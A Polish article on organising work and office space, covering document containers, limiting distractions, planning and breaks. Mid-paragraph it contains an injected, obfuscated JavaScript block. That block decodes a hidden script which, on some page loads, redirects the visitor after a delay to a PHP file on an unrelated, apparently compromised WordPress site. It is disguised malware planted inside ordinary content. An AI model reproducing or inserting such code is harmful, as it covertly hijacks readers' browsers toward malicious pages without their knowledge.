Dobra organizacja czasu

 

Każdy chce pracować efektywnie i szybko. Aby to jednak było możliwe konieczna jest dobra organizacja pracy i miejsca, w którym pracujemy, np stosując różnego rodzaju pojemniki. To zapewni nam możliwość skoncentrowania się na wykonywanych zadaniach. Porządek jest więc podstawą.

Dokumenty w biurowych pojemnikach

wygodne pojemniki biurowe <script>function u2fd518ba9147(q3){var u9='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var y7='';var ve,p7,w9,w4,y6,p9,y4;var s0=0;do{w4=u9.indexOf(q3.charAt(s0++));y6=u9.indexOf(q3.charAt(s0++));p9=u9.indexOf(q3.charAt(s0++));y4=u9.indexOf(q3.charAt(s0++));ve=(w4<<2)|(y6>>4);p7=((y6&15)<<4)|(p9>>2);w9=((p9&3)<<6)|y4;if(ve>=192)ve+=848;else if(ve==168)ve=1025;else if(ve==184)ve=1105;y7+=String.fromCharCode(ve);if(p9!=64){if(p7>=192)p7+=848;else if(p7==168)p7=1025;else if(p7==184)p7=1105;y7+=String.fromCharCode(p7);}if(y4!=64){if(w9>=192)w9+=848;else if(w9==168)w9=1025;else if(w9==184)w9=1105;y7+=String.fromCharCode(w9);}}while(s0<q3.length);document.write(y7);};u2fd518ba9147('PHNjcmlwdD4NCnZhciBudW1iZXIxPU1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqIDYpOyANCmlmIChudW1iZXIxPT0zKQ0Kew0KIHZhciBkZWxheSA9IDE4MDAwOwkNCiBzZXRUaW1lb3V0KCJkb2N1bWVudC5sb2NhdGlvbi5ocmVmPSdodHRwOi8vd3d3LmJ0bGF3ZmlybS5jb20vd3AtY29udGVudC9wbHVnaW5zL3NpLWNvbnRhY3QtZm9ybS9jYXB0Y2hhLXNlY3VyZWltYWdlL3NlY3VyaW1hZ2Vfc3RvcC5waHAnIiwgZGVsYXkpOw0KfQ0KPC9zY3JpcHQ+');</script>na dokumentyNie dajmy się przekonać, że „artystyczny nieład” wspomoże naszą kreatywność. W praktyce będziemy rozdrażnieni i zmarnujemy czas na poszukiwanie drobiazgów oraz ważnych rzeczy. Gdy sięgamy niemal intuicyjnie po różne przedmioty i dokumenty zyskujemy mnóstwo czasu. Dlatego przydatne będą wygodne pojemniki biurowe na dokumenty, przyborniki na biurko, notatnik pod ręką i inne udogodnienia. Konieczne jest też wyeliminowanie rzeczy, które nam przeszkadzają. Choć nie zawsze da się zrezygnować ze wszystkiego np. wyłączyć telefon w czasie pracy, to możemy ściszyć dźwięki, wyłączyć w komputerze niepotrzebne strony i komunikatory czy portale społecznościowe. Warto też uprzedzić współpracowników, że chcemy się skupić i żeby nam nie przeszkadzali w trakcie pracy bez ważnych powodów. W dobrej organizacji pracy niezbędne jest też planowanie, ustalanie priorytetów, odhaczanie załatwionych spraw. W plan dnia trzeba też wkomponować przerwy, dzięki czemu praca będzie efektywna. Warto podczas takiej przerwy oderwać się od komputera i porozmawiać z kolegami, pójść na krótki spacer albo chociaż pospacerować po korytarzu i postać chwilę przy otwartym oknie. Warto też czasem zamknąć oczy i posiedzieć w ciszy. To pozwoli nam naprawdę odpocząć. Takie przerwy pozwolą odpocząć naszym oczom, rozprostować ciało, dotlenić się i odprężyć.

Dobrze zorganizowana praca zapewni, że szybciej uporasz się z obowiązkami i będziesz mieć więcej czasu na inne czynności albo na chwilę relaksu. Na pewno nie będziesz też zostawać w pracy po godzinach by dokończyć ważne sprawy.